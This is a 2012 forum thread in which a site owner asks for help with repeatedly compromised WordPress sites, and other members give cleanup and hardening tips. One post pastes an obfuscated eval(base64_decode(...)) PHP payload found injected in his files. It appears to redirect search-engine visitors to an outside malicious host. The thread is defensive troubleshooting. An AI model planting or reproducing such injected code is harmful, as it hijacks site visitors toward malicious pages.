1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Sites keep getting hacked, could use a little help.

Discussion in 'BlackHat Lounge' started by 67731, Oct 9, 2012.

  1. 67731

    67731 Regular Member

    Joined:
    Aug 27, 2011
    Messages:
    231
    Likes Received:
    47
    Occupation:
    SEO TECH - Looking to work for myself. . .
    Location:
    Las Vegas NV
    My sites are all on Wordpress, and they keep getting hacked. I have taken them all off line and am cleaning them one by one before putting them back.

    I have 10 sites online now, and it happened again, does anyone know a good database scanner?

    And anything else that you many know would help out a lot!
     
  2. nerdmoney

    nerdmoney Junior Member

    Joined:
    Feb 24, 2008
    Messages:
    135
    Likes Received:
    37
    Occupation:
    web nerd
    Make sure you overwrite with a download version of the latest WP distribution; dont just use the built in update as there is a hack that targeta updates. Obviously change all passworda including cpanel. Check your custom themes and use the timthumb vulnerability scanner plugin. If it happens after all that your host may have been hacked. PM if that doesn't work and I'll take alook for you.
     
    • Thanks Thanks x 1
  3. 67731

    67731 Regular Member

    Joined:
    Aug 27, 2011
    Messages:
    231
    Likes Received:
    47
    Occupation:
    SEO TECH - Looking to work for myself. . .
    Location:
    Las Vegas NV
    Thanks, another good scanner I would recomand to people is Wordfence, this has been great to let me know if things are still happening. What ever has been hacking my site seems to start out by placing some bad code in the index.php of the site.

    So I have changed that to file permission 444, and that has seemed to help.

    I am not sure if its the google update of my site being hacked but for some reason all my pages are not seeming to rank, as in it looks like they are all deindexed. . . I would love for someone to take a look at the site and see if they can see a reason for this.
     
  4. gamingmaster42

    gamingmaster42 Regular Member

    Joined:
    Jul 21, 2010
    Messages:
    473
    Likes Received:
    176
    Home Page:
    • Thanks Thanks x 1
  5. 67731

    67731 Regular Member

    Joined:
    Aug 27, 2011
    Messages:
    231
    Likes Received:
    47
    Occupation:
    SEO TECH - Looking to work for myself. . .
    Location:
    Las Vegas NV
  6. drywallrob

    drywallrob Jr. VIP Jr. VIP Premium Member

    Joined:
    Apr 27, 2011
    Messages:
    992
    Likes Received:
    476
    I have used these guys, and they do a good job.

    http://sucuri.net/

    I had a similar issue. I tried to do it myself and got frustrated after 4 hours...
     
  7. BlueNebula

    BlueNebula Junior Member

    Joined:
    Nov 25, 2009
    Messages:
    100
    Likes Received:
    59
    Occupation:
    Experienced Marketer and Team Leader
    Location:
    Andromeda Galaxy
    What is your definition of getting "hacked"? I know some people who leave there facebook open and some one updates their status to something laughable they consider it being "hacked". If your just getting alot of spam obviously use an anti-spam plugin. If some one is actually gaining access to your admin panel change your password. However if its happening to all your sites im assuming you are hosting all your WP sites on a single hosting account.
     
  8. 67731

    67731 Regular Member

    Joined:
    Aug 27, 2011
    Messages:
    231
    Likes Received:
    47
    Occupation:
    SEO TECH - Looking to work for myself. . .
    Location:
    Las Vegas NV

    1: When someone was able to upload a FULL wordpress install in a subfolder and use my database

    2: when pulling every file off my server and finding something like 1200 times when code like this has been placed all over just about EVERY file.

    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcmVsZWxscmUuNHB1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));
     
  9. david4weaver

    david4weaver BANNED BANNED

    Joined:
    Nov 26, 2011
    Messages:
    18
    Likes Received:
    13
    Dude, you are in a funny position ..... lol.
     
  10. BlueNebula

    BlueNebula Junior Member

    Joined:
    Nov 25, 2009
    Messages:
    100
    Likes Received:
    59
    Occupation:
    Experienced Marketer and Team Leader
    Location:
    Andromeda Galaxy
    Are all your WP hosted on a single account?
     
  11. ice41

    ice41 Power Member

    Joined:
    Aug 18, 2012
    Messages:
    783
    Likes Received:
    248
    Occupation:
    Web Designer
    Location:
    Land of Pineapples
    That my friend is not hack, that is called injection. Your pages had been injected, check your functions.php and other php files. Software installs and such. If you can't find it, delete everything and start from scratch. Lesser headache, more time to work for you.
     
  12. 67731

    67731 Regular Member

    Joined:
    Aug 27, 2011
    Messages:
    231
    Likes Received:
    47
    Occupation:
    SEO TECH - Looking to work for myself. . .
    Location:
    Las Vegas NV

    Yep, all on one account. (1nad1)
     
  13. 67731

    67731 Regular Member

    Joined:
    Aug 27, 2011
    Messages:
    231
    Likes Received:
    47
    Occupation:
    SEO TECH - Looking to work for myself. . .
    Location:
    Las Vegas NV

    Thats what I have been doing, the only things I kept was the database, theme (custom built by me) and the plugins.

    Everything was fine and clean for about two weeks but then today it came back, WordFence has done a great job at scanning the plugins, I am starting to think there must be something in the database of a site.

    I have 1: replaced all wordpress files 2: changed database passwords 3: changed keycodes (https://api.wordpress.org/secret-key/1.1/salt/) 4: cleaned all files going back in and uploaded everything.
     
  14. private parts

    private parts Newbie

    Joined:
    Oct 8, 2012
    Messages:
    6
    Likes Received:
    6
    it seems your website is not proteced against sql injection. they usally put code in a form or something else that has the php POST function.
    do you have some kind of form somewhere? try adding captcha's and checking wp for anti-sql injection plugins.

    good luck.
     
  15. hpv222

    hpv222 Power Member

    Joined:
    Feb 8, 2010
    Messages:
    736
    Likes Received:
    274
    I had to deal with the same situation - all my WP sites on 2 different hosts (one in Europe and one in the US); you should clean everything up, check your htaccess files too, mine had shit injected there too, make sure that they are properly CHMODed after that, most of the injections I found in the themes' .php files though; update your WPs, and also contact your host and let them know
     
  16. hpv222

    hpv222 Power Member

    Joined:
    Feb 8, 2010
    Messages:
    736
    Likes Received:
    274
    one more thing - check if Google has detected malware on your sites; if they have, all your users, using Chrome will get warning when opening your sites and your sites will be taken off the listings; all you have to do is verify that you own the sites and send them for reconsideration - BTW, they are pretty quick at checking and re-listing the sites